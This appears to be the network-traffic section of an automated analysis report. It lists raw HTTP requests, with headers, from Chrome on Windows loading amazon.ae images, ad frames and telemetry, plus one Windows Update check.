Source: global trafficHTTP traffic detected: GET /images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy._CB600087478_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/consumables_uae/Amazonbasket/XCM_Manual_1532278_5307764_400x39_2X._CB616351825_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c._SY116_CB613590867_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy._CB600087478_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/consumables_uae/Amazonbasket/XCM_Manual_1532278_5307764_400x39_2X._CB616351825_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kl2U8yuCv7Zo65W&MD=b5mTn25W HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /images/S/sash/Z8YwjOjqIHxqujG.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Events/XCM_Manual_1537854_5334346_372x232_2X._SY116_CB613596448_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead- HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.amazon.aeSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/612naZmko3L._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/sash/Z8YwjOjqIHxqujG.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7._SY116_CB613590867_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/XCM_Manual_Budget_store_DQC_5b30ed29-b351-4c7c-ae2c-885863964831._SY116_CB613590867_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead- HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/AE_HSBC_BTS_AUG_GW_DC_758x608_EN._SY304_CB568253382_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911846_186x116_1X_en_AE._SY116_CB566464918_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/612naZmko3L._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911878_186x116_1X_en_AE._SY116_CB566464918_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"device-memory: 8rtt: 150sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-viewport-width: 1280sec-ch-device-memory: 8viewport-width: 1280sec-ch-ua-platform-version: "10.0.0"dpr: 1downlink: 7.65sec-ch-dpr: 1ect: 4gsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; csm-hit=adb:adblk_no&t:1723469005585
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911851_186x116_1X_en_AE._SY116_CB566464918_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911856_186x116_1X_en_AE._SY116_CB566464918_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41Qtra7lf+L.js HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://images-eu.ssl-images-amazon.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; csm-hit=adb:adblk_no&t:1723469005585; ubid-acbae=261-1616972-1526733
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41Qtra7lf+L.js HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745515_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DC37SFEY0GDXEZ5HDEVRN:0 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733
